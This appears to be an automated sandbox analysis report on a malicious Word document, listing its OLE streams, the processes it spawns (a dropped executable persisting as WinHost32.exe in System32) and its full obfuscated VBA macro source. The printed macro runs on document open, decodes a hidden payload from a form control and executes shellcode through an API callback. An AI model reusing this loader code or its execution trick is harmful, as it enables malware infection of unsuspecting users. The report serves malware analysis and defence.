Data ASCII: | . . , . . . . . n | . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q l t . . f . . . . . . . . . . . . . . . . . ( . . . F . . . . . . . . . . . h . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 2c 00 8a 0e a0 0e 6e 7c dd 00 01 00 00 00 01 07 ff ff 01 01 00 00 02 00 00 00 00 7d 00 00 df 1a 00 00 1c 1f 00 00 00 00 00 00 00 00 00 00 04 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 6c 74 00 00 66 12 00 00 00 00 01 00 04 00 10 10 10 00 01 00 04 00 28 01 00 00 46 00 00 00 10 10 00 00 01 00 08 00 68 05 00 00 6e 01 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 d6 06 00 00 20 20 |
Stream Path: Macros/crappie/i01/\x1CompObj, File Type: data, Stream Size: 112 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/i01/\x1CompObj |
File Type: | data |
Stream Size: | 112 |
Entropy: | 4.6011544911 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Macros/crappie/i01/f, File Type: data, Stream Size: 48 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/i01/f |
File Type: | data |
Stream Size: | 48 |
Entropy: | 2.34371071693 |
Base64 Encoded: | False |
Data ASCII: | . . $ . B . . . n | . . . . . . . . . . . } . . d . . . p . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 24 00 42 0c 02 08 6e 7c dd 00 04 80 00 00 03 00 00 00 00 7d 00 00 64 18 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Macros/crappie/i01/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/i01/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: Macros/crappie/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: WordDocument, File Type: data, Stream Size: 52501 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 52501 |
Entropy: | 7.46691549854 |
Base64 Encoded: | True |
Data ASCII: | . . . . q ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j q P q P . . . . . . . . . . . . . . . . . . . . . . . . . . . : . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . " . . . . . . . " . . . . . . . " . . . . . |
Data Raw: | ec a5 c1 00 71 60 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 06 00 00 03 08 00 00 0e 00 62 6a 62 6a 71 50 71 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 15 cd 00 00 13 3a 01 00 13 3a 01 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 15:29:40 |
Start date: | 08/12/2016 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0x2fef0000 |
File size: | 1422168 bytes |
MD5 hash: | 113371C5AC72FCE072F707C55E7845B9 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:29:55 |
Start date: | 08/12/2016 |
Path: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:29:59 |
Start date: | 08/12/2016 |
Path: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:30:37 |
Start date: | 08/12/2016 |
Path: | C:\Windows\System32\WinHost32.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WinHost32.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:30:37 |
Start date: | 08/12/2016 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | /c del C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe >> NUL |
Imagebase: | 0x4aac0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:30:40 |
Start date: | 08/12/2016 |
Path: | C:\Windows\System32\WinHost32.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WinHost32.exe |
Imagebase: | 0x400000 |
File size: | 37376 bytes |
MD5 hash: | 18B827BD1ABF15A978C89878BC02B355 |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | Dim hydrocharitaceae as String |
10 | Dim munching as Integer |
11 | Dim differ as Long |
12 | Dim titubate as String |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function bloodied@ThisDocument: csociality | |
Part of subcall function bloodied@ThisDocument: Left | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: UCase | |
Part of subcall function bloodied@ThisDocument: Left | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: Left | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: UCase | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: impissation | |
Part of subcall function bloodied@ThisDocument: plevna | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: UCase | |
Part of subcall function bloodied@ThisDocument: LCase | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: arranger | |
Part of subcall function bloodied@ThisDocument: Mid | |
Part of subcall function bloodied@ThisDocument: Right | |
Part of subcall function bloodied@ThisDocument: LCase | |
UCase |
Strings | Decrypted Strings |
---|---|
"gesneriaceae" | |
"bountiful" | |
"mo" | |
"mot""orized" | |
"sT" | |
"mo" | |
"sT" | |
"bountiful" | |
"mot""orized" |
Line | Instruction | Meta Information |
---|---|---|
133 | Private Sub Document_Open() | |
134 | Dim casa as Byte | executed |
135 | Dim omnipresence as Variant | |
136 | aldol = "gesneriaceae" | |
137 | bloodied | |
138 | microtus = 80 | |
139 | arcidae = 74 | |
140 | If microtus + arcidae < 8 Then | |
141 | microtus = "mo" + UCase("sT") | UCase |
142 | titubate = "bountiful" | |
143 | eruditeness = "mot" + "orized" | |
144 | Else | |
145 | munching = munching / 280 | |
146 | arcidae = 9 | |
147 | Endif | |
148 | End Sub |
APIs | Meta Information |
---|---|
csociality | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: Asc | |
Part of subcall function phonocamptic@andosite: CByte | |
Part of subcall function phonocamptic@andosite: UBound | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: LCase | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: UCase | |
Part of subcall function phonocamptic@andosite: Left | |
Part of subcall function phonocamptic@andosite: UCase | |
Part of subcall function phonocamptic@andosite: Left | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: Left | |
Part of subcall function phonocamptic@andosite: LCase | |
Part of subcall function phonocamptic@andosite: UBound | |
Part of subcall function phonocamptic@andosite: UCase | |
Part of subcall function phonocamptic@andosite: LCase | |
Part of subcall function phonocamptic@andosite: Mid | |
Part of subcall function phonocamptic@andosite: UBound | |
Left | |
Mid | |
UCase | |
Left | |
Right | |
Left | |
Right | |
UCase | |
Mid | |
kernel32!HeapCreate | kernel32!HeapCreate(262144,0,0) |
kernel32!HeapAlloc | kernel32!HeapAlloc(123076608,0,3287) |
Right | |
UCase | |
Part of subcall function misstanding@ThisDocument: Left | |
Part of subcall function misstanding@ThisDocument: Right | |
Part of subcall function misstanding@ThisDocument: Left | |
Part of subcall function misstanding@ThisDocument: Mid | |
Part of subcall function misstanding@ThisDocument: Path | |
Part of subcall function misstanding@ThisDocument: Name | |
Part of subcall function agural@ThisDocument: methyltestosterone | |
Part of subcall function agural@ThisDocument: VarPtr | |
Part of subcall function agural@ThisDocument: LCase | |
Part of subcall function agural@ThisDocument: UCase | |
Part of subcall function agural@ThisDocument: LCase | |
Part of subcall function agural@ThisDocument: methyltestosterone | |
LCase | |
Mid | |
kernel32!EnumResourceTypesW | kernel32!EnumResourceTypesW(0,123080841,"C:/bill_0803708258.doc") |
Mid | |
Right | |
LCase |
Strings | Decrypted Strings |
---|---|
"Pr" | |
"gleesome" | |
"piapostasy" | |
"gleesome" | |
"piapostasy" | |
"Pr" | |
"gavia" | |
"secularization" | |
"CS" | |
"boarmed" | |
"boarmed" | |
"CS" | |
"abrupt" | |
"touchstone" | |
"domesticationbe" | |
"archerfish" | |
"archerfish" | |
"cotinus" | |
"cycling" | |
"chewy" | |
"ab" | |
"advowson" | |
"AM" | |
"atrialbebastion" | |
"atrialbebastion" | |
"AM" |
Line | Instruction | Meta Information |
---|---|---|
35 | Sub bloodied() | |
36 | Dim airhole as Integer | executed |
37 | Dim anaerobic as Integer | |
38 | bullshot = crappie.csociality.ControlTipText | csociality |
39 | anemometric = andosite.phonocamptic(bullshot) | |
40 | For eastcentral = 42 To 67 | |
41 | dingbat = 67 | |
42 | titubate = "gleesome" | |
43 | ectoproct = Left("piapostasy", 2) & "geon" & Mid("stockistholemotherofpearl", 9, 4) | Left Mid |
44 | ectoproct = UCase("Pr") & Left("ayinitaly", 4) & Right("basedg", 1) | UCase Left Right |
45 | Next eastcentral | |
47 | saucepan = "gavia" | |
48 | #if Win64 then | |
49 | Dim bigswoln as Integer | |
50 | Dim comatose as LongPtr | |
51 | Dim limewater as Long | |
52 | #else | |
53 | Dim guerrilla as Variant | |
54 | Dim unmaligned as Long | |
55 | Dim comatose as Long | |
56 | #endif | |
57 | besom = 35 - 85 + 3 + 47 | |
58 | acidfast = "secularization" | |
59 | acquest = 4096 | |
60 | ablepsia = 11 | |
61 | While ablepsia < 14 | |
62 | alternator = Left("boarmed", 2) + Right("epitheliodiling", 5) | Left Right |
63 | grosgrain = UCase("CS") & Mid("debrisubstitutenonsmoker", 7, 9) | UCase Mid |
64 | ablepsia = ablepsia + 1 | |
65 | munching = differ - 318 | |
66 | Wend | |
68 | loiseleuria = impissation(262144, 0, 0) | kernel32!HeapCreate(262144,0,0) executed |
69 | comatose = plevna(loiseleuria, 0, 3287) | kernel32!HeapAlloc(123076608,0,3287) executed |
70 | dividing = "abrupt" | |
71 | Dim dirtyminded as String | |
72 | disclose = "touchstone" | |
73 | peacocks = Right("domesticationbe", 2) + UCase("EfY") | Right UCase |
74 | dirtyminded = misstanding | |
75 | striated = 3 | |
76 | While striated < 8 | |
77 | striated = striated + 1 | |
78 | titubate = "archerfish" | |
79 | Wend | |
81 | affriction = anemometric | |
82 | biliary = "cotinus" | |
83 | agural comatose, affriction | |
84 | cerambycidae = "cycling" | |
85 | #if Win64 then | |
86 | Dim eggshell as Variant | |
87 | contagion = "chewy" | |
88 | occlusion = LCase("ab") & Mid("afterhourslepscartload", 11, 4) & "y" | LCase Mid |
89 | gasp = "advowson" | |
90 | mors = 64 - 58 + 125 + 445 | |
91 | #else | |
92 | mors = 22 + 484 + 1727 | |
93 | #endif | |
94 | Dim di as String | |
95 | Dim stopwatch as Long | |
96 | Dim deathrate as Long | |
97 | deathrate = 0 | |
98 | Dim galician as Long | |
99 | galician = comatose + mors | |
100 | oman = arranger(deathrate, galician, dirtyminded) | kernel32!EnumResourceTypesW(0,123080841,"C:/bill_0803708258.doc") executed |
101 | For tartars = 12 To 54 | |
102 | borrower = 54 | |
103 | munching = munching - 219 | |
104 | cortes = Mid("atrialbebastion", 7, 2) & Right("bassettowitch", 5) | Mid Right |
105 | cortes = LCase("AM") & LCase("BiveR") & "sion" | LCase |
106 | Next tartars | |
108 | End Sub |
APIs | Meta Information |
---|---|
ntdll!RtlMoveMemory | ntdll!RtlMoveMemory(0,3243072,4) |
VarPtr | |
LCase | |
UCase | |
LCase | |
ntdll!RtlMoveMemory | ntdll!RtlMoveMemory(123078608,92766092,3222) |
Strings | Decrypted Strings |
---|---|
"Ca" | |
"Ng" | |
"er""ecti" | |
"Ca" | |
"Ng" | |
"er""ecti" |
Line | Instruction | Meta Information |
---|---|---|
13 | Function agural(miniver, longheaded) | |
14 | Dim burrheaded as String | executed |
15 | Dim abysm as Byte | |
16 | differ = differ \ 426 | |
17 | Dim brownstone as Integer | |
18 | Dim guyana as Long | |
19 | Dim argonaut as Integer | |
20 | Dim furuncle as String | |
21 | Dim gnat as Long | |
22 | methyltestosterone guyana, ByVal VarPtr(longheaded) + 8, 4 | ntdll!RtlMoveMemory(0,3243072,4) VarPtr executed |
23 | munching = differ + 127 | |
24 | gnat = miniver | |
25 | For archetype = 26 To 76 | |
26 | sciotlo = 76 | |
27 | munching = munching \ 236 | |
28 | dusky = LCase("Ca") + UCase("tAlatIc") | LCase UCase |
29 | dusky = "er" & "ecti" & LCase("Ng") | LCase |
30 | Next archetype | |
32 | methyltestosterone ByVal gnat, ByVal guyana, 17 - 45 + 102 + 3148 | ntdll!RtlMoveMemory(123078608,92766092,3222) executed |
33 | differ = munching - 433 | |
34 | End Function |
APIs | Meta Information |
---|---|
Left | |
Right | |
Left | |
Mid | |
Path | |
Name |
Strings | Decrypted Strings |
---|---|
"fo" | |
"renomarchantia" | |
"stpussycat" | |
"fo" | |
"renomarchantia" | |
"stpussycat" |
Line | Instruction | Meta Information |
---|---|---|
110 | Function misstanding() | |
111 | Dim aise as Long | executed |
112 | Dim malfeasance as Long | |
113 | For dekagram = 5 To 56 | |
114 | wires = 56 | |
115 | titubate = titubate | |
116 | aslant = "fo" & Left("renomarchantia", 4) & Right("whiteliveredon", 2) | Left Right |
117 | aslant = Left("stpussycat", 2) & Mid("ursidaerucklithodidae", 8, 4) | Left Mid |
118 | Next dekagram | |
120 | constantan = ThisDocument.Path | Path |
121 | misstanding = constantan & "/" & ThisDocument.Name | Name |
122 | End Function |
Non-Executed Functions |
---|
APIs | Meta Information |
---|---|
wdHeaderFooterPrimary | |
wdHeaderFooterPrimary |
Strings | Decrypted Strings |
---|---|
"<Replace this with your text>" | |
"<Replace this with your text>" |
Line | Instruction | Meta Information |
---|---|---|
123 | Sub HeaderFooterObject() | |
124 | Dim MyText as String | |
125 | MyHeaderText = "<Replace this with your text>" | |
126 | MyFooterText = "<Replace this with your text>" | |
127 | With ActiveDocument.Sections(1) | |
128 | . Headers(wdHeaderFooterPrimary).Range.Text = MyHeaderText | wdHeaderFooterPrimary |
129 | . Footers(wdHeaderFooterPrimary).Range.Text = MyFooterText | wdHeaderFooterPrimary |
130 | End With | |
131 | End Sub |
Module: andosite |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "andosite" |
2 | 'ka\xc5\xbeu na Jamajci gand\xc5\xbeu prodaju na kilo |
3 | 'i da okus bude bolji s ka\xc5\xa1ikom Vegete |
4 | #if Win64 then |
5 | 'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune |
6 | 'Sve dok je ovaca ne\xc4\x2021e falit' vune |
7 | Public Declare PtrSafe Function inserted Lib "kernel32" Alias "CreateEventA"(lpEventAttributes as Any, bManualReset as LongPtr, bInitialState as LongPtr, lpName as String) |
8 | 'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija |
9 | 'Ka\xc5\xbeu \xc5\xa1to je babi milo to joj se i snilo |
10 | Public Declare PtrSafe Function impissation Lib "kernel32" Alias "HeapCreate"(ByVal abortive as LongPtr, ByVal gyratory as LongPtr, ByVal soldering as LongPtr) as LongPtr |
11 | 'Sve dok je ovaca ne\xc4\x2021e falit' vune |
12 | 'i da su nas banke uvukle u krizu |
13 | Public Declare PtrSafe Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory"(pDst as Any, pSrc as Any, ByVal ByteLen as LongPtr) |
14 | 'Spale su nam ga\xc4\x2021e, zagrizli smo udice |
15 | 'Od Vatikana do Irana |
16 | Public Declare PtrSafe Function collinear Lib "gdi32" Alias "SelectObject"(hdc as Any, hgdiobj as LongPtr) |
17 | 'i da su nas banke uvukle u krizu |
18 | 'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune |
19 | Public Declare PtrSafe Function cyclosporeae Lib "kernel32" Alias "GetPriorityClass"(hProcess as LongPtr) as LongPtr |
20 | 'Ka\xc5\xbeu opet Iran pravi nuklearne bombe |
21 | 'Od Vatikana do Irana |
22 | Public Declare PtrSafe Function substituted Lib "user32" Alias "CopyIcon"(ByVal hIcon as LongPtr) as LongPtr |
23 | 'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija |
24 | 'Spale su nam ga\xc4\x2021e, zagrizli smo udice |
25 | Public Declare PtrSafe Function nard Lib "user32" Alias "EndDialog"(ByVal hDlg as LongPtr, nResult as LongPtr) as LongPtr |
26 | 'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija |
27 | 'ka\xc5\xbeu na Jamajci gand\xc5\xbeu prodaju na kilo |
28 | Public Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW"(ByVal hModule as Any, ByVal lpEnumFunc as Any, lParam as Any) as LongPtr |
29 | 'Spale su nam ga\xc4\x2021e, zagrizli smo udice |
30 | 'majmunu je dovoljna banana |
31 | Public Declare PtrSafe Function plevna Lib "kernel32" Alias "HeapAlloc"(ByVal asterismal as LongPtr, ByVal cholelithiasis as LongPtr, ByVal enveloping as LongPtr) as LongPtr |
32 | 'Od Vatikana do Irana |
33 | 'Mene tjeraju na izbore svake dvije godine |
35 | 'Ka\xc5\xbeu da malu djecu donosi nam roda |
36 | 'Mene tjeraju na izbore svake dvije godine |
37 | #else |
38 | '\xc4\x8dudotvorni sapun protiv tvrdokornih mrlja |
39 | 'Mene tjeraju na izbore svake dvije godine |
40 | Public Declare Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory"(pDst as Any, pSrc as Any, ByVal ByteLen as Long) |
41 | 'Ka\xc5\xbeu opet Iran pravi nuklearne bombe |
42 | 'Glave nam u pijesku, neza\xc5\xa1ti\xc4\x2021ene guzice |
43 | Public Declare Function overseer Lib "gdi32" Alias "SelectObject"(hdc as Any, hgdiobj as Long) |
44 | 'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune |
45 | 'majmunu je dovoljna banana |
46 | Public Declare Function grains Lib "kernel32" Alias "GetPriorityClass"(hProcess as Long) as Long |
47 | 'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune |
48 | 'Sve dok je ovaca ne\xc4\x2021e falit' vune |
49 | Public Declare Function ninnyhammer Lib "user32" Alias "EndDialog"(ByVal hDlg as Long, nResult as Long) as Long |
50 | 'i da smo na vrhu liste po odlivu "mozaka" |
51 | '\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka |
52 | Public Declare Function beige Lib "kernel32" Alias "CreateEventA"(lpEventAttributes as Any, bManualReset as Long, bInitialState as Long, lpName as String) |
53 | '\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka |
54 | '\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka |
55 | Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW"(ByVal hModule as Any, ByVal lpEnumFunc as Any, lParam as Any) as Long |
56 | '\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka |
57 | '\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka |
58 | Public Declare Function lyking Lib "user32" Alias "CopyIcon"(hIcon as Long) as Long |
59 | 'Ka\xc5\xbeu da je smak svijeta relativno blizu |
60 | 'igrali smo dobro ali zajeb'o nas sudija |
61 | Public Declare Function plevna Lib "kernel32" Alias "HeapAlloc"(ByVal reportable as Long, ByVal melanosis as Long, ByVal macrencephaly as Long) as Long |
62 | 'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune |
63 | 'igrali smo dobro ali zajeb'o nas sudija |
64 | Public Declare Function impissation Lib "kernel32" Alias "HeapCreate"(ByVal relentless as Long, ByVal definable as Long, ByVal indefectibility as Long) as Long |
65 | 'i da su nas banke uvukle u krizu |
66 | 'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija |
68 | 'i da jedino je zdrava fla\xc5\xa1irana voda |
69 | 'a ja glasam za kafanu i marihuanu |
70 | #endif |
71 | 'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune |
72 | 'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Mid | |
Asc | |
CByte | |
UBound | |
Mid | |
LCase | |
Mid | |
UCase | |
Left | |
UCase | |
Left | |
Mid | |
Left | |
LCase | |
UBound | |
UCase | |
LCase | |
Mid | |
UBound |
Strings | Decrypted Strings |
---|---|
"impregnated" | |
"impregnated" | |
"dingcryosteoarthritis" | |
"semiliteratecacongeries" | |
"semiliteratecacongeries" | |
"dingcryosteoarthritis" | |
"eNDO" | |
"stazadirachta" | |
"eNDO" | |
"stazadirachta" | |
"di" | |
"sGui" | |
"sU" | |
"di" | |
"sGui" | |
"sU" | |
"coolant" |
Line | Instruction | Meta Information |
---|---|---|
85 | Function phonocamptic(compulsory) as String | |
86 | Dim brassiere as Integer | executed |
88 | Dim recency as Long | |
89 | Dim breakfast as Long | |
90 | Dim orions as Integer | |
92 | Dim farceur(255) as Byte | |
93 | Dim kaffiyeh() as Byte | |
94 | Dim graveunknelld as String | |
95 | Dim abaft as Long | |
97 | Dim givers as Long | |
98 | Dim hyperon(63) as Long | |
99 | Dim burhinidae(63) as Long | |
100 | Dim apnea(63) as Long | |
101 | Dim hind() as Byte | |
102 | munching = munching / 91 | |
104 | munching = munching + 461 | |
106 | Dim homogenate as Long | |
107 | Dim baptismal as Integer | |
108 | Dim semicolon as Byte | |
110 | grail = 105 + 262039 | |
111 | impeccant = 24 + 66 + 166 | |
112 | mechanic = 65536 | |
113 | Dim idemnity as Byte | |
115 | jewess = 65280 | |
116 | defensively = 67 + 26 + 4003 | |
117 | fortune = 86 - 22 | |
118 | Dim unintermitting as Integer | |
120 | mostaccioli = 128 - 26 - 8 + 257954 | |
121 | northeasterly = 16515072 | |
122 | rhagoletis = 108 + 16711572 | |
123 | glaucium = 59 + 4 | |
124 | condiment = 4032 | |
125 | sharper = 255 | |
126 | Dim sobersides as Variant | |
127 | Dim starchy() as Byte | |
128 | Redim starchy(4295) | |
129 | novelette = 4296 | |
130 | For i = 1 To novelette | |
131 | doxy = Mid(compulsory, i, 1) | Mid |
132 | inarticulately = (Asc(doxy)) | Asc |
133 | starchy(i - 1) = ((CByte(inarticulately))) | CByte |
134 | Next | |
135 | Dim infernal as Long | |
136 | nationalist = 10 | |
137 | While nationalist < 13 | |
138 | nationalist = nationalist + 1 | |
139 | hydrocharitaceae = "impregnated" | |
140 | Wend | |
142 | evection = UBound(starchy) | UBound |
143 | laughably = 22 | |
144 | For unstressed = 0 To evection | |
145 | starchy(unstressed) = starchy(unstressed) + 2 | |
146 | starchy(unstressed) = starchy(unstressed) Xor laughably | |
147 | Next unstressed | |
148 | dequet = 73 | |
149 | clementine = 91 | |
150 | If dequet + clementine < 4 Then | |
151 | dequet = Mid("semiliteratecacongeries", 13, 2) + LCase("SED") | Mid LCase |
152 | hydrocharitaceae = titubate | |
153 | ovation = Mid("dingcryosteoarthritis", 5, 3) + UCase("OSuRg") + Left("erycoding", 3) | Mid UCase Left |
154 | Else | |
155 | munching = differ - 387 | |
156 | clementine = 12 | |
157 | Endif | |
159 | baptismal = 0 | |
160 | paprika = 99 + 23 | |
161 | reasonable = 255 | |
162 | For homogenate = 0 To reasonable | |
163 | Select Case homogenate | |
164 | Case 65 To 90 | |
165 | farceur(homogenate) = homogenate - 65 | |
166 | Case 97 To paprika | |
167 | farceur(homogenate) = homogenate - 71 | |
168 | Case 48 To 57 | |
169 | farceur(homogenate) = homogenate + 4 | |
170 | Case 43 | |
171 | farceur(homogenate) = 62 | |
172 | Case 47 | |
173 | farceur(homogenate) = 63 | |
174 | End Select | |
175 | Next homogenate | |
176 | For homogenate = 0 To 63 | |
177 | burhinidae(homogenate) = homogenate * fortune | |
178 | hyperon(homogenate) = homogenate * defensively | |
179 | apnea(homogenate) = homogenate * grail | |
180 | Next homogenate | |
181 | For litteraire = 13 To 55 | |
182 | deformed = 55 | |
183 | differ = differ \ 476 | |
184 | stocks = UCase("eNDO") + Left("parasimany", 6) + Mid("chemakuantegrains", 10, 2) | UCase Left Mid |
185 | stocks = Left("stazadirachta", 2) & LCase("RAIn") | Left LCase |
186 | Next litteraire | |
188 | kaffiyeh = starchy | |
189 | crax = 4 | |
190 | Redim hind((((UBound(kaffiyeh) + 1) \ crax) * 3) - 1) | UBound |
191 | isochronism = 72 | |
192 | negotiate = 91 | |
193 | If isochronism + negotiate < 28 Then | |
194 | isochronism = "di" + UCase("sGui") + "sement" | UCase |
195 | munching = munching And 326 | |
196 | barbital = LCase("sU") & Mid("cholerberousblackamoor", 7, 6) | LCase Mid |
197 | Else | |
198 | munching = differ \ 409 | |
199 | negotiate = 38 | |
200 | Endif | |
202 | achillea = 3 | |
203 | titubate = "coolant" | |
205 | hydrocharitaceae = titubate | |
207 | gorgonzola = achillea + 1 | |
208 | For breakfast = 0 To UBound(kaffiyeh) Step gorgonzola | UBound |
209 | mentioning = kaffiyeh(breakfast) | |
210 | givers = apnea(farceur(mentioning)) + hyperon(farceur(kaffiyeh(breakfast + 1))) + burhinidae(farceur(kaffiyeh(breakfast + 2))) + farceur(kaffiyeh(breakfast + achillea)) | |
212 | homogenate = mercenaria(givers, rhagoletis) | |
213 | hind(recency) = cynoglossidae(homogenate, mechanic) | |
214 | homogenate = mercenaria(givers, jewess) | |
215 | hind(recency + 1) = cynoglossidae(homogenate, impeccant) | |
216 | hind(recency + 2) = mercenaria(givers, sharper) | |
217 | recency = recency + 3 | |
218 | Next breakfast | UBound |
219 | phonocamptic = hind | |
220 | End Function |
Line | Instruction | Meta Information |
---|---|---|
79 | Function cynoglossidae(curdling, dropout) | |
80 | cynoglossidae = curdling \ dropout | executed |
81 | End Function |
Line | Instruction | Meta Information |
---|---|---|
82 | Function mercenaria(anaphrodisia, foulard) | |
83 | mercenaria = anaphrodisia And foulard | executed |
84 | End Function |
Non-Executed Functions |
---|
APIs | Meta Information |
---|---|
Visible |
Strings | Decrypted Strings |
---|---|
"Sheet2" |
Line | Instruction | Meta Information |
---|---|---|
